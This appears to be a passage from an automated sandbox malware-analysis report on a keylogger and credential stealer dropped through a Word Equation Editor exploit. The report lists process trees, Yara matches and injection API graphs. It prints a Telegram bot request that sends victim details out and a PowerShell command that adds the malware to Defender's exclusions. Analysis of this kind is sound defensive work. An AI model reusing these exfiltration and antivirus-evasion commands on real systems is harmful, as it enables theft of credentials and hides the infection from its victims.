                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.2249181149.154.167.2204433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:13 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2010/7/2024%20/%2011:37:00%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                          Host: api.telegram.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-07 12:56:13 UTC344INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Mon, 07 Oct 2024 12:56:13 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 55
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          2024-10-07 12:56:13 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:08:55:46
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                          Imagebase:0x13f910000
                                                                                          File size:1'423'704 bytes
                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:08:55:47
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                          Imagebase:0x400000
                                                                                          File size:543'304 bytes
                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:08:55:51
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\obisfd.exe"
                                                                                          Imagebase:0x1300000
                                                                                          File size:686'080 bytes
                                                                                          MD5 hash:384AA6D3431E34610390EA4F6AA37A17
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:08:55:53
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe"
                                                                                          Imagebase:0xbf0000
                                                                                          File size:427'008 bytes
                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:08:55:53
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\obisfd.exe"
                                                                                          Imagebase:0x1300000
                                                                                          File size:686'080 bytes
                                                                                          MD5 hash:384AA6D3431E34610390EA4F6AA37A17
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:08:56:10
                                                                                          Start date:07/10/2024
                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                          Imagebase:0x400000
                                                                                          File size:543'304 bytes
                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:16.8%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:125
                                                                                            Total number of Limit Nodes:8
                                                                                            execution_graph 8142 2ce6c8 8145 2cf410 8142->8145 8146 2cf42a 8145->8146 8165 d304a6 8146->8165 8170 d30382 8146->8170 8175 d303be 8146->8175 8181 d305ff 8146->8181 8189 d3029f 8146->8189 8198 d30518 8146->8198 8203 d3047b 8146->8203 8208 d30395 8146->8208 8215 d301f6 8146->8215 8219 d30751 8146->8219 8224 d30571 8146->8224 8232 d30251 8146->8232 8237 d30191 8146->8237 8242 d3040c 8146->8242 8247 d3084d 8146->8247 8254 d3030d 8146->8254 8260 d3010d 8146->8260 8147 2ce6e1 8166 d304bf 8165->8166 8264 2cd0b8 8166->8264 8268 2cd0c0 8166->8268 8167 d30882 8167->8147 8167->8167 8172 d302b2 8170->8172 8171 d302ed 8171->8147 8172->8171 8272 2cdc78 8172->8272 8276 2cdc71 8172->8276 8176 d303c7 8175->8176 8177 d3080d 8176->8177 8280 2cdb48 8176->8280 8284 2cdb50 8176->8284 8177->8147 8178 d307b4 8178->8147 8182 d305e3 8181->8182 8182->8181 8183 d304d4 8182->8183 8288 2cd5e8 8182->8288 8292 2cd5e1 8182->8292 8185 2cd0b8 ResumeThread 8183->8185 8186 2cd0c0 ResumeThread 8183->8186 8184 d30882 8184->8147 8184->8184 8185->8184 8186->8184 8190 d302a6 8189->8190 8191 d3026d 8189->8191 8196 2cdc78 WriteProcessMemory 8190->8196 8197 2cdc71 WriteProcessMemory 8190->8197 8194 2cdc78 WriteProcessMemory 8191->8194 8195 2cdc71 WriteProcessMemory 8191->8195 8192 d30275 8193 d302ed 8193->8147 8194->8192 8195->8192 8196->8193 8197->8193 8199 d30423 8198->8199 8201 2cdb48 VirtualAllocEx 8199->8201 8202 2cdb50 VirtualAllocEx 8199->8202 8200 d307b4 8200->8147 8201->8200 8202->8200 8204 d30481 8203->8204 8206 2cd0b8 ResumeThread 8204->8206 8207 2cd0c0 ResumeThread 8204->8207 8205 d30882 8205->8147 8206->8205 8207->8205 8209 d3030c 8208->8209 8212 2cdc78 WriteProcessMemory 8209->8212 8213 2cdc71 WriteProcessMemory 8209->8213 8210 d3020a 8210->8147 8211 d30110 8211->8210 8296 2ce113 8211->8296 8212->8211 8213->8211 8217 d30110 8215->8217 8216 d3020a 8217->8216 8218 2ce113 CreateProcessA 8217->8218 8218->8217 8220 d306e0 8219->8220 8222 2cdb48 VirtualAllocEx 8220->8222 8223 2cdb50 VirtualAllocEx 8220->8223 8221 d307b4 8221->8147 8222->8221 8223->8221 8226 d305e3 8224->8226 8225 d304d4 8230 2cd0b8 ResumeThread 8225->8230 8231 2cd0c0 ResumeThread 8225->8231 8226->8225 8228 2cd5e8 Wow64SetThreadContext 8226->8228 8229 2cd5e1 Wow64SetThreadContext 8226->8229 8227 d30882 8227->8147 8227->8227 8228->8226 8229->8226 8230->8227 8231->8227 8233 d3026d 8232->8233 8235 2cdc78 WriteProcessMemory 8233->8235 8236 2cdc71 WriteProcessMemory 8233->8236 8234 d30275 8235->8234 8236->8234 8238 d3019e 8237->8238 8239 d30110 8237->8239 8238->8147 8240 d3020a 8239->8240 8241 2ce113 CreateProcessA 8239->8241 8241->8239 8243 d30412 8242->8243 8245 2cdb48 VirtualAllocEx 8243->8245 8246 2cdb50 VirtualAllocEx 8243->8246 8244 d307b4 8244->8147 8245->8244 8246->8244 8248 d3097d 8247->8248 8300 2cddd0 8248->8300 8304 2cddd8 8248->8304 8249 d3020a 8250 d30110 8250->8249 8251 2ce113 CreateProcessA 8250->8251 8251->8250 8257 2cdc78 WriteProcessMemory 8254->8257 8258 2cdc71 WriteProcessMemory 8254->8258 8255 d3020a 8255->8147 8256 d30110 8256->8255 8259 2ce113 CreateProcessA 8256->8259 8257->8256 8258->8256 8259->8256 8261 d30110 8260->8261 8262 d3020a 8261->8262 8263 2ce113 CreateProcessA 8261->8263 8262->8262 8263->8261 8265 2cd0c0 ResumeThread 8264->8265 8267 2cd156 8265->8267 8267->8167 8269 2cd104 ResumeThread 8268->8269 8271 2cd156 8269->8271 8271->8167 8273 2cdcc4 WriteProcessMemory 8272->8273 8275 2cdd63 8273->8275 8275->8171 8277 2cdcc4 WriteProcessMemory 8276->8277 8279 2cdd63 8277->8279 8279->8171 8281 2cdb94 VirtualAllocEx 8280->8281 8283 2cdc12 8281->8283 8283->8178 8285 2cdb94 VirtualAllocEx 8284->8285 8287 2cdc12 8285->8287 8287->8178 8289 2cd631 Wow64SetThreadContext 8288->8289 8291 2cd6af 8289->8291 8291->8182 8293 2cd631 Wow64SetThreadContext 8292->8293 8295 2cd6af 8293->8295 8295->8182 8297 2ce11c CreateProcessA 8296->8297 8299 2ce2f5 8297->8299 8301 2cde24 ReadProcessMemory 8300->8301 8303 2cdea2 8301->8303 8303->8250 8305 2cde24 ReadProcessMemory 8304->8305 8307 2cdea2 8305->8307 8307->8250

                                                                                            Executed Functions

                                                                                            Function 002C04C0 Relevance: 2.4, Strings: 1, Instructions: 1163COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 22 2c04c0-2c114b 26 2c114d 22->26 27 2c1152-2c1890 call 2c0748 * 4 call 2c0758 call 2c0768 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 22->27 26->27 126 2c189d-2c18ae 27->126 127 2c18b0-2c18b1 126->127 128 2c1892-2c189a 126->128 129 2c18d2-2c18e4 127->129 128->126 130 2c18e6-2c192b 129->130 131 2c18b3-2c18c0 129->131 136 2c19e2-2c19f4 130->136 132 2c18c7-2c18d1 131->132 133 2c18c2 131->133 132->129 133->132 137 2c19fa-2c1a0a 136->137 138 2c1930-2c194b 136->138 139 2c1b6d-2c1b82 137->139 146 2c194d-2c194f 138->146 147 2c1958-2c195b 138->147 140 2c1b8a-2c1b8c 139->140 141 2c1b84 139->141 145 2c1b93-2c1b9a 140->145 143 2c1b8e 141->143 144 2c1b86-2c1b88 141->144 143->145 144->140 144->143 150 2c1a0f-2c1a2d 145->150 151 2c1ba0-2c208e call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0808 call 2c0798 call 2c07a8 call 2c07b8 145->151 152 2c1956 146->152 153 2c1951 146->153 148 2c195d 147->148 149 2c1962-2c1968 147->149 148->149 154 2c196f-2c1982 149->154 155 2c196a 149->155 156 2c1a2f 150->156 157 2c1a34-2c1a4e 150->157 244 2c2095-2c21e5 151->244 245 2c2090 151->245 152->149 153->152 158 2c1989-2c19a3 154->158 159 2c1984 154->159 155->154 156->157 160 2c1a55-2c1a6b 157->160 161 2c1a50 157->161 163 2c19aa-2c19c0 158->163 164 2c19a5 158->164 159->158 165 2c1a6d 160->165 166 2c1a72-2c1a95 call 2c07f8 160->166 161->160 169 2c19c7-2c19e1 call 2c07f8 163->169 170 2c19c2 163->170 164->163 165->166 175 2c1a9c-2c1aac 166->175 176 2c1a97 166->176 169->136 170->169 179 2c1aae 175->179 180 2c1ab3-2c1adc 175->180 176->175 179->180 182 2c1afd-2c1b1b 180->182 183 2c1ade-2c1ae5 180->183 185 2c1b1d 182->185 186 2c1b22-2c1b33 182->186 188 2c1aed-2c1afc 183->188 185->186 189 2c1b3a-2c1b58 186->189 190 2c1b35 186->190 188->182 193 2c1b5f-2c1b6c 189->193 194 2c1b5a 189->194 190->189 193->139 194->193 258 2c21f0-2c23f4 call 2c07c8 call 2c0818 call 2c0828 call 2c0d10 * 5 call 2c0808 call 2c07a8 call 2c0d20 call 2c0d30 call 2c0d40 244->258 245->244
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 90
                                                                                            • API String ID: 0-1770303465
                                                                                            • Opcode ID: a81dbac41300e8b8ab5336e532e60f28c22af61b0ab54de17e5e30f7762ca253
                                                                                            • Instruction ID: 865fb55386d89073b69c03d06bd55ebb27a465355415988cfaee495f327c73d2
                                                                                            • Opcode Fuzzy Hash: a81dbac41300e8b8ab5336e532e60f28c22af61b0ab54de17e5e30f7762ca253
                                                                                            • Instruction Fuzzy Hash: BDC2C034A11218CFDB54DF64C994ED9B7B2BF8A300F1582E9E509AB361DB31AE95CF40
                                                                                            Function 002C1111 Relevance: 2.3, Strings: 1, Instructions: 1002COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 295 2c1111-2c1118 296 2c111a-2c1121 295->296 297 2c1122-2c114b 295->297 296->297 299 2c114d 297->299 300 2c1152-2c1387 call 2c0748 * 4 call 2c0758 call 2c0768 call 2c0778 call 2c0788 297->300 299->300 336 2c1391-2c13ab call 2c0798 300->336 338 2c13b0-2c1890 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 336->338 399 2c189d-2c18ae 338->399 400 2c18b0-2c18b1 399->400 401 2c1892-2c189a 399->401 402 2c18d2-2c18e4 400->402 401->399 403 2c18e6-2c192b 402->403 404 2c18b3-2c18c0 402->404 409 2c19e2-2c19f4 403->409 405 2c18c7-2c18d1 404->405 406 2c18c2 404->406 405->402 406->405 410 2c19fa-2c1a0a 409->410 411 2c1930-2c194b 409->411 412 2c1b6d-2c1b82 410->412 419 2c194d-2c194f 411->419 420 2c1958-2c195b 411->420 413 2c1b8a-2c1b8c 412->413 414 2c1b84 412->414 418 2c1b93-2c1b9a 413->418 416 2c1b8e 414->416 417 2c1b86-2c1b88 414->417 416->418 417->413 417->416 423 2c1a0f-2c1a2d 418->423 424 2c1ba0-2c1eaa call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 call 2c0778 call 2c0788 call 2c0798 call 2c07a8 call 2c07b8 call 2c07c8 call 2c07d8 call 2c07e8 418->424 425 2c1956 419->425 426 2c1951 419->426 421 2c195d 420->421 422 2c1962-2c1968 420->422 421->422 427 2c196f-2c1982 422->427 428 2c196a 422->428 429 2c1a2f 423->429 430 2c1a34-2c1a4e 423->430 498 2c1eb4-2c1efd call 2c0808 424->498 425->422 426->425 431 2c1989-2c19a3 427->431 432 2c1984 427->432 428->427 429->430 433 2c1a55-2c1a6b 430->433 434 2c1a50 430->434 436 2c19aa-2c19c0 431->436 437 2c19a5 431->437 432->431 438 2c1a6d 433->438 439 2c1a72-2c1a95 call 2c07f8 433->439 434->433 442 2c19c7-2c19e1 call 2c07f8 436->442 443 2c19c2 436->443 437->436 438->439 448 2c1a9c-2c1aac 439->448 449 2c1a97 439->449 442->409 443->442 452 2c1aae 448->452 453 2c1ab3-2c1adc 448->453 449->448 452->453 455 2c1afd-2c1b1b 453->455 456 2c1ade-2c1ae5 453->456 458 2c1b1d 455->458 459 2c1b22-2c1b33 455->459 461 2c1aed-2c1afc 456->461 458->459 462 2c1b3a-2c1b58 459->462 463 2c1b35 459->463 461->455 466 2c1b5f-2c1b6c 462->466 467 2c1b5a 462->467 463->462 466->412 467->466 501 2c1f03-2c202a call 2c0798 call 2c07a8 call 2c07b8 498->501 513 2c2031-2c204f 501->513 514 2c205a-2c2066 513->514 515 2c2070-2c2078 514->515 516 2c207e-2c208e 515->516 517 2c2095-2c21bc 516->517 518 2c2090 516->518 530 2c21c7-2c21e5 517->530 518->517 531 2c21f0-2c23f4 call 2c07c8 call 2c0818 call 2c0828 call 2c0d10 * 5 call 2c0808 call 2c07a8 call 2c0d20 call 2c0d30 call 2c0d40 530->531
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 90
                                                                                            • API String ID: 0-1770303465
                                                                                            • Opcode ID: 34b267c915447b7c577888d6108249e3d0c937501e947236698150313638cc7c
                                                                                            • Instruction ID: 4ad3a5a84058e05f214b1f7deaaca512e2cbf02f179786a095211523d713d626
                                                                                            • Opcode Fuzzy Hash: 34b267c915447b7c577888d6108249e3d0c937501e947236698150313638cc7c
                                                                                            • Instruction Fuzzy Hash: 18B2D234A11218CFDB54DF64C994ED9B7B2BF8A304F5181E9E509AB361DB31AE85CF40
                                                                                            Function 002CE113 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 568 2ce113-2ce11a 569 2ce11c-2ce130 568->569 570 2ce160-2ce1b6 568->570 569->570 575 2ce132-2ce137 569->575 573 2ce1fc-2ce2f3 CreateProcessA 570->573 574 2ce1b8-2ce1cc 570->574 593 2ce2fc-2ce3e1 573->593 594 2ce2f5-2ce2fb 573->594 574->573 583 2ce1ce-2ce1d3 574->583 576 2ce139-2ce143 575->576 577 2ce15a-2ce15d 575->577 578 2ce145 576->578 579 2ce147-2ce156 576->579 577->570 578->579 579->579 582 2ce158 579->582 582->577 585 2ce1d5-2ce1df 583->585 586 2ce1f6-2ce1f9 583->586 587 2ce1e1 585->587 588 2ce1e3-2ce1f2 585->588 586->573 587->588 588->588 590 2ce1f4 588->590 590->586 606 2ce3f1-2ce3f5 593->606 607 2ce3e3-2ce3e7 593->607 594->593 609 2ce405-2ce409 606->609 610 2ce3f7-2ce3fb 606->610 607->606 608 2ce3e9-2ce3ec 607->608 608->606 613 2ce419-2ce41d 609->613 614 2ce40b-2ce40f 609->614 610->609 612 2ce3fd 610->612 612->609 615 2ce41f-2ce448 613->615 616 2ce453-2ce45e 613->616 614->613 617 2ce411 614->617 615->616 621 2ce45f 616->621 617->613 621->621
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002CE2D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: ab0ae977bdfafcfabe01ae62f5bc6db707d2a8882523de1e71a779bd178a2d1e
                                                                                            • Instruction ID: 72f3a7cd0616e59a00973eb03cf98781485f55d547eb1ef5f91a76bb90643e6f
                                                                                            • Opcode Fuzzy Hash: ab0ae977bdfafcfabe01ae62f5bc6db707d2a8882523de1e71a779bd178a2d1e
                                                                                            • Instruction Fuzzy Hash: 4C9126B0D0026A8FDF20CFA4C845BEDBBB1BF05304F0592A9E419B7250DB749A95CF95
                                                                                            Function 002CDC71 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 622 2cdc71-2cdce3 624 2cdcfa-2cdd61 WriteProcessMemory 622->624 625 2cdce5-2cdcf7 622->625 627 2cdd6a-2cddbc 624->627 628 2cdd63-2cdd69 624->628 625->624 628->627
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002CDD4B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: f8b7d21003970ad5a0c1fc9ad90e9b0bdd0c40bf53a87e65ae474aec8a778db4
                                                                                            • Instruction ID: 8aedfee0b9c02c9735264b2e8bc20ea982dc8feb7997f6c1e0bfb500b1deca07
                                                                                            • Opcode Fuzzy Hash: f8b7d21003970ad5a0c1fc9ad90e9b0bdd0c40bf53a87e65ae474aec8a778db4
                                                                                            • Instruction Fuzzy Hash: B741CBB5D012488FCF00CFA9D984AEEFBB1BF49300F20942AE815BB210C335AA55CF54
                                                                                            Function 002CDC78 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 633 2cdc78-2cdce3 635 2cdcfa-2cdd61 WriteProcessMemory 633->635 636 2cdce5-2cdcf7 633->636 638 2cdd6a-2cddbc 635->638 639 2cdd63-2cdd69 635->639 636->635 639->638
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002CDD4B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 54158a06ca8bfe01a1d287d7323b7dbc2aab6115d217eb270d9d70882d47a2b8
                                                                                            • Instruction ID: f4ddf26b9a7550f552b1186c15e26366f2fe3dfe2792e74bd3b4b77554c339a4
                                                                                            • Opcode Fuzzy Hash: 54158a06ca8bfe01a1d287d7323b7dbc2aab6115d217eb270d9d70882d47a2b8
                                                                                            • Instruction Fuzzy Hash: DC41ABB5D012589FCF00CFA9D984AEEFBF1BB49310F20942AE815BB210D375AA55CF64
                                                                                            Function 002CDDD0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 644 2cddd0-2cdea0 ReadProcessMemory 647 2cdea9-2cdefb 644->647 648 2cdea2-2cdea8 644->648 648->647
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002CDE8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: c9d89e5decddec72e8da2083408143abba5faaf289f464f5e69760f2afb1451a
                                                                                            • Instruction ID: 8173568ae1e0d9d85aee3644dc8f7212c7507eed46c421d85f8154ebc08c6eac
                                                                                            • Opcode Fuzzy Hash: c9d89e5decddec72e8da2083408143abba5faaf289f464f5e69760f2afb1451a
                                                                                            • Instruction Fuzzy Hash: 4841A9B4D00258DFCF00CFA9D884AEEBBB1BB59310F24942AE815BB210D335A955DF65
                                                                                            Function 002CDDD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 653 2cddd8-2cdea0 ReadProcessMemory 656 2cdea9-2cdefb 653->656 657 2cdea2-2cdea8 653->657 657->656
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002CDE8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
